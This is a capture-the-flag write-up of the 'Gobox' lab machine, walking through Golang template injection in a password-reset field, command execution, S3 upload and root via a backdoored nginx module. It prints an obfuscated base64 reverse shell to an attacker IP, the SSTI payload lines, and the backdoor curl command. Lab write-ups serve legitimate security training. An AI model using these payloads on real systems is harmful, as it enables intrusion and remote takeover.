Gobox

Detailed Walkthrough

Initial Access

Upon establishing a connection to the VPN, the tester initiated the assessment by performing a service enumeration. This process revealed the following open ports:

22/tcp open OpenSSH 8.2p1
80/tcp open HTTP
4566/tcp open HTTP
8080/tcp open HTTP

Applications running on Server:

http://gobox.htb/

http://gobox.htb:8080/

http://gobox.htb:4566/

During the enumeration phase, the tester ran feroxbuster to discover directories and identified on http://gobox.htb:8080/forgot/ endpoint a Forget Password functionality implemented.

❯ feroxbuster --url http://gobox.htb/ -t 400 --dont-extract-links
❯ feroxbuster --url http://gobox.htb:8080/ -t 400 --dont-extract-links
❯ feroxbuster --url http://gobox.htb:4566/ -t 400 --dont-extract-links
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://gobox.htb/
 🚩  In-Scope Url          │ gobox.htb
 🚀  Threads               │ 400
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
[####################] - 13s    30000/30000   2327/s  http://gobox.htb/ 
[####################] - 13s    30000/30000   2385/s  http://gobox.htb/css/
[####################] - 33s    30000/30000   917/s   http://gobox.htb:8080/ 
[####################] - 33s    30000/30000   912/s   http://gobox.htb:8080/forgot/
[####################] - 8s     30000/30000   3632/s  http://gobox.htb:4566/

By testing the functionality within email field, it was discovered that the email address was reflected on the web. this reflection exposes an input-controller sink and opens potential avenues for exploitation.

Additionally, the request was intercepted using Burpsuite revealed that the application was running golang as programming language.

Utilizing the information and recognizing that Golang offers a built-in template engine, the tester proceeded to execute an SSTI payload, successfully obtaining the ippsec password.

Upon authentication with Ippsec credentials, the application revealed its source code, which included a vulnerable function named DebugCmd that permits command execution on the target server.

<SNIF>
func (u User) DebugCmd (test string) string {
  ipp := strings.Split(test, " ")
  bin := strings.Join(ipp[:1], " ")
  args := strings.Join(ipp[1:], " ")
  if len(args) > 0{
    out, _ := exec.Command(bin, args).CombinedOutput()
    return string(out)
  } else {
    out, _ := exec.Command(bin).CombinedOutput()
    return string(out)
  }
}
<SNIF>

Testing the function that leads to a Remote command execution.

During the enumeration, the tester enumerated the hostname which was called AWS, isuggesting that it might be storing AWS credentials, however, the typical path ~/.aws/credentials contained a base64 string with an useless message typically of CTF.

Continuing with the enumeration, the tester leveraged the AWS credentials found on the server to list the S3 buckets and discovered a bucket named 'website' that was hosting the application accessible at http://gobox.htb/.

To obtain a reverse shell, the tester uploaded a PHP reverse shell in the bucket and triggered navigating to http://gobox.htb/shell.php.

email={{.DebugCmd `echo '<?php system("echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEwLzEyMzQgMD4mMQ==|base64 -d|bash")?>' > /dev/shm/shell.php`}}
email={{.DebugCmd `aws s3 cp /dev/shm/shell.php  s3://website`}}

Lateral Movement

Privilege escalation

After compromising the target server, the tester initiated a deeper enumeration and found some unusual modules enabled for Nginx.

www-data@gobox:/etc/nginx$ ls modules-enabled/
50-backdoor.conf  50-mod-http-image-filter.conf  50-mod-http-xslt-filter.conf  50-mod-mail.conf  50-mod-stream.conf
www-data@gobox:/etc/nginx/modules-enabled$ cat 50-backdoor.conf
load_module modules/ngx_http_execute_module.so;

Upon searching for ngx_http_execute_module.so, a GitHub repository named NginxExecute was found, which explains how to utilize it via GET and POST request using system.run parameter and the correct server configuration for the command set as on.

www-data@gobox:/etc/nginx$ cat sites-enabled/default
<SNIF>
server {
	listen 127.0.0.1:8000;
	location / {
		command on;
	}
}

Regrettably, the module installed on the system were altered, but a straightforward search using strings command revealed the correct name parameter for command execution.

www-data@gobox:/etc/nginx$ strings /usr/lib/nginx/modules/ngx_http_execute_module.so | grep run
ippsec.run
www-data@gobox:/etc/nginx$ curl -g "127.0.0.1:8000/?ippsec.run[id]"
uid=0(root) gid=0(root) groups=0(root)
www-data@gobox:/etc/nginx$

Credentials

Username

Password

Methods

Scope

Notes

ippsec@hacking.esports

<SNIF>

SSTI Injection

http://gobox.htb:8080/

👤 Users wordlist

0xten
rafax00
luska
maki
josue
kohaku
pedpedro
celesian
felipevasc
phyushin
big0us

🔑 Password wordlist

<SNIF>

Subdomains / Hosts

Subdomain / Host

Host

Description

Notes

AWS

172.28.0.3

Docker container

gobox

10.10.11.113

Main server

Host Discovered

Nombre

Domain

Low Access

High Access

gobox

10.10.11.113

gobox.htb

Linux

Scans

# Nmap 7.95 scan initiated Fri Oct 24 23:09:37 2025 as: /usr/lib/nmap/nmap --privileged --open -sS -Pn -n -p- -T5 -A -oN 10.10.11.113_tcp_allports -vvv 10.10.11.113
Nmap scan report for 10.10.11.113
Host is up, received user-set (0.069s latency).
Scanned at 2025-10-24 23:09:38 PDT for 38s
Not shown: 65481 closed tcp ports (reset), 50 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCgSpafkjRVogAlgtxt6cFN7sU4sRTiGYC01QloBpbOwerqFUoYNyhCdNP/9rvdhwFpXomoMhDxioWQZb1RTSbR5aCwkzwDRnLz5PKN/7faaoEVjFM1vSnjGwWxzPZJw4Xy8wEbvMDlNZQbWu44UMWhLH+Vp63egRsut0SkTpUy3Ovp/yb3uAeT/4sUPG+LvDgzXD2QY+O1SV0Y3pE+pRmL3UfRKr2ltMfpcc7y7423+3oRSONHfy1upVUcUZkRIKrl9Qb4CDpxbVi/hYfAFQcOYH+IawAounkeiTMMEtOYbzDysEzVrFcCiGPWOX5+7tu4H7jYnZiel39ka/TFODVA+m2ZJiz2NoKLKTVhouVAGkH7adYtotM62JEtow8MW0HCZ9+cX6ki5cFK9WQhN++KZej2fEZDkxV7913KaIa4HCbiDq1Sfr5j7tFAWnNDo097UHXgN5A0mL1zNqwfTBCHQTEga/ztpDE0pmTKS4rkBne9EDn6GpVhSuabX9S/BLk=
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ9LolyD5tnJ06EqjRR6bFX/7oOoTeFPw2TKsP1KCHJcsPSVfZIafOYEsWkaq67dsCvOdIZ8VQiNAKfnGiaBLOo=
|   256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJOP8cvEQVqCwuWYT06t/DEGxy6sNajp7CzuvfJzrCRZ
80/tcp   open  http    syn-ack ttl 63 nginx
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Hacking eSports | {{.Title}}
4566/tcp open  http    syn-ack ttl 63 nginx
|_http-title: 403 Forbidden
8080/tcp open  http    syn-ack ttl 63 nginx
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Hacking eSports | Home page
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 271532D72FD5025CF19147524DE66481
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=10/24%OT=22%CT=1%CU=43934%PV=Y%DS=2%DC=T%G=N%TM=68FC69
OS:C8%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M552ST11NW7%O2=M552ST11NW7%O3=M552NNT11NW7%O4=M552ST11NW7%O5=M552ST1
OS:1NW7%O6=M552ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M552NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 26.087 days (since Sun Sep 28 21:04:58 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   65.73 ms 10.10.14.1
2   65.90 ms 10.10.11.113

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 24 23:10:16 2025 -- 1 IP address (1 host up) scanned in 38.62 seconds

Scripts / Automations

Flag Discovered

Flag #

Host

Flag location

Method used

Value

User

10.10.11.113

/var/www

SSTI on Golang

<SNIF>

Root

10.10.11.113

/root

Nginx module Abuse

<SNIF>

PreviousEpsilon NextBucket

Last updated 1 month ago